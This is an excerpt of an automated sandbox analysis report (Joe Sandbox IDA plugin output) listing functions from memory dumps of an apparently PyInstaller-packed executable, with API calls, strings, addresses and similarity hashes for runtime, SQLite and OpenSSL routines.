GetModuleHandleW.KERNEL32 ref: 00007FF6A29B23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6A29B248E
DeleteObject.GDI32 ref: 00007FF6A29B24C1
DestroyIcon.USER32 ref: 00007FF6A29B24D3

Strings

Unhandled exception in script, xrefs: 00007FF6A29B23F8

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction ID: 7cd31d4b8acf0b514270a77b9ccc8e0a4560aed8dc0cec3c390876a684a75fec
Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction Fuzzy Hash: 00318432A4A68189EB24DF22E8552F963A0FF88B88F440135EA4D87B5BDF7CD100D700

Function 00007FF6A29B2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6A29B918F,?,00007FF6A29B3C55), ref: 00007FF6A29B2BA0
MessageBoxW.USER32 ref: 00007FF6A29B2C2A

Strings

WARNING, xrefs: 00007FF6A29B2BAF
Warning, xrefs: 00007FF6A29B2C1D
[PYI-%d:%ls] , xrefs: 00007FF6A29B2BA8

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: f3ac2ac17ec3c8bf984ab61d76ec7833834c9d58a30cd64f3de3ed90b4df0346
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: 2221A362B09B4186E7109B26F4547EA73A4FB88BC8F400136EE8D9765BDF7CD605D740

Function 00007FF6A29B2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6A29B1B99), ref: 00007FF6A29B2760

Strings

Error, xrefs: 00007FF6A29B27DE
ERROR, xrefs: 00007FF6A29B276F
Error [ANSI Fallback], xrefs: 00007FF6A29B27CF
[PYI-%d:%s] , xrefs: 00007FF6A29B2768

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 52964d977038a293663dd9cfafa3e2ed55c28e7c3bf06825afa48c4db16e9e47
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: 9D21A172A5AB8182E620DB52F8817E66394FF88BC8F400136EE8C9375ADFBCD5459700

Function 00007FF6A29C9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6A29C9B1D
GetProcAddress.KERNEL32 ref: 00007FF6A29C9B33
FreeLibrary.KERNEL32 ref: 00007FF6A29C9B5A

Strings

CorExitProcess, xrefs: 00007FF6A29C9B2C
mscoree.dll, xrefs: 00007FF6A29C9B14

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: d520a6f038c21e0ef555ee41f3a61349b9345e854baaa79cd777a563fd590117
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 41F0C231B4AB0681FB148B22E4643395360BF49F69F440239C66E861E5CFACE044F300

Function 00007FF6A29D93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6A29D9400
_set_statfp.LIBCMT ref: 00007FF6A29D941B
_set_statfp.LIBCMT ref: 00007FF6A29D9437
_set_statfp.LIBCMT ref: 00007FF6A29D9473

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 6d07d2a71f6d4b4cc8c80b1c1d7a0f55c5dafa228b64f865ff172a1211eeb096
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: EB119172EDEA2301F6543126D75637520C46F5DBBCF050634EA6E8A2D7EEECB9417104

Function 00007FF6A29CB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB41F
FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB43E
FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB466
FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB477
FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB488

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction ID: 1d7f2d9e553d8f47129fa4d761a6aaf4f07bbf8e62ae070a2063227739b019d3
Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction Fuzzy Hash: 7F118120F8F60249FA589723A5A127961425F64FBCF448335E87DC66D7DEBCF441A301

Function 00007FF6A29CB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6A29CB2A5
FlsSetValue.KERNEL32 ref: 00007FF6A29CB2C4
FlsSetValue.KERNEL32 ref: 00007FF6A29CB2EC
FlsSetValue.KERNEL32 ref: 00007FF6A29CB2FD
FlsSetValue.KERNEL32 ref: 00007FF6A29CB30E

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction ID: 32ae4e378718d1dd155a0806f2024c251872120cf07e713f444891ed9415ca24
Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction Fuzzy Hash: 4C112A20E8B2074DF96CA62754612BE21425F56F7CF444734D93ECA6C7DDACB8417202

Function 00007FF6A29C6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C6176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C622C

Strings

verbose, xrefs: 00007FF6A29C6020

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 6c0a7007b30ce88d8657dfd546cd2038640b9ffcd029eb39e61ab9fc3e2a1f47
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: F091CF32A4AA4689F7658E26D45077D37A1AB84F9CF444136DA8AC73CBDFBCF405A301

Function 00007FF6A29CFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CFF17

Part of subcall function 00007FF6A29C7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C7AC9

Strings

UTF-8, xrefs: 00007FF6A29CFE96
ccs, xrefs: 00007FF6A29CFE52
UTF-16LEUNICODE, xrefs: 00007FF6A29CFEB5

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 6cae1eda240d8d74012f358bc9fd8d4ff0139abd9d968cc9023134093b84cc96
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 3381A172E8A2428EF7644E27C11027836A0AF11F8CF958036DA0DD769BDFADF941B741

Function 00007FF8A8678A30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

database corruption, xrefs: 00007FF8A8678AEF
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A8678ADC
%s at line %d of [%.10s], xrefs: 00007FF8A8678AF6

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 0-3727861699
Opcode ID: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
Instruction ID: c78eae72c16a4e53be4f68a80c379e7bedd07f6e245fe2608f425821aa960bfd
Opcode Fuzzy Hash: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
Instruction Fuzzy Hash: 75812BA27092C5AAE7108B25C58877E7BA1FB40BC4F085132DF8D87641DF3CE865C7A8

Function 00007FF8A86B3EF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86B411E

Strings

, , xrefs: 00007FF8A86B3FAE
, xrefs: 00007FF8A86B3FCD
CREATE TABLE , xrefs: 00007FF8A86B400F

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: $, $CREATE TABLE
API String ID: 22509725-3459038510
Opcode ID: f5dab35276e823905d8a8efc2fbf2e609b3d139e1c4d1f6f4a3d61b1e56e9fbb
Instruction ID: a4471af778b026b0d85c9ab7766a30e8d5e3ee5657c28d4dc78c000892442a4a
Opcode Fuzzy Hash: f5dab35276e823905d8a8efc2fbf2e609b3d139e1c4d1f6f4a3d61b1e56e9fbb
Instruction Fuzzy Hash: AD612963B4A5819AEB258F28A4442B9B7A2FB44BE8F445335DE5D433D1DF3DD846C304

Function 00007FF8A806F070 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A806F127

Strings

SSL_SESSION_new, xrefs: 00007FF8A806F0D0, 00007FF8A806F18E
ssl_get_new_session, xrefs: 00007FF8A806F1D2, 00007FF8A806F30A
..\s\ssl\ssl_sess.c, xrefs: 00007FF8A806F0B2, 00007FF8A806F0DC, 00007FF8A806F19A, 00007FF8A806F1BE, 00007FF8A806F1DE, 00007FF8A806F316

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
API String ID: 3535234312-2527649602
Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
Instruction ID: 3277abee52640f5949743885bad341cd8287e879d61dd7aebbe94107a80d0e66
Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
Instruction Fuzzy Hash: 8071EB21B0AA82A6FF44EB21D8553FD6690EB84BC4F444035EE1D4B7D6DF7CE4618B28

Function 00007FF8A8042469 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

00007FF8B9F71250.VCRUNTIME140 ref: 00007FF8A809D776

Strings

tls_parse_ctos_server_name, xrefs: 00007FF8A809D729, 00007FF8A809D785, 00007FF8A809D7F6, 00007FF8A809D823, 00007FF8A809D868
D:\a\1\s\include\internal/packet.h, xrefs: 00007FF8A809D7AE, 00007FF8A809D7CF
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FF8A809D735, 00007FF8A809D79A, 00007FF8A809D802, 00007FF8A809D82F, 00007FF8A809D874

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007F71250
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
API String ID: 3434520956-4157686371
Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
Instruction ID: 0f04e23a171d2fb8af4b2398e935e29f681d72651ee02a5cfe1b39e73a4bd37c
Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
Instruction Fuzzy Hash: 6F61D061F4EA9265FF209B25D4013B9AB91EF45BC4F484131DD4C4BAD6EF3CE5A08B28

Function 00007FF6A29BD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6A29BD6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6A29BD77A
RtlUnwindEx.KERNEL32 ref: 00007FF6A29BD7D4

Strings

csm, xrefs: 00007FF6A29BD761

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 715ec2aea275e2c7a29b8bfca51d503d3dfeb064d06ee3f2f22374a1d0862013
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: AC519F32B5A6028AEB149F16E444A787791FB44F9CF108134DA4E8BB8BDFBDE841D710

Function 00007FF8A8678D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A8678DB7

Strings

database corruption, xrefs: 00007FF8A8678F45
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A8678F39
%s at line %d of [%.10s], xrefs: 00007FF8A8678F51

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 22509725-3727861699
Opcode ID: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
Instruction ID: e3dec1e5643a20686855f4bc2fd63ee3696b020aba7ca629bf612d0790de0b43
Opcode Fuzzy Hash: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
Instruction Fuzzy Hash: 8751FDB2709BC095DB10CB19E4886AEBB61F758BC4F19903AEA8E03754DF3CD891C718

Function 00007FF6A29BF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6A29BF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6A29BF408

Strings

csm, xrefs: 00007FF6A29BF342
csm, xrefs: 00007FF6A29BF45A

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
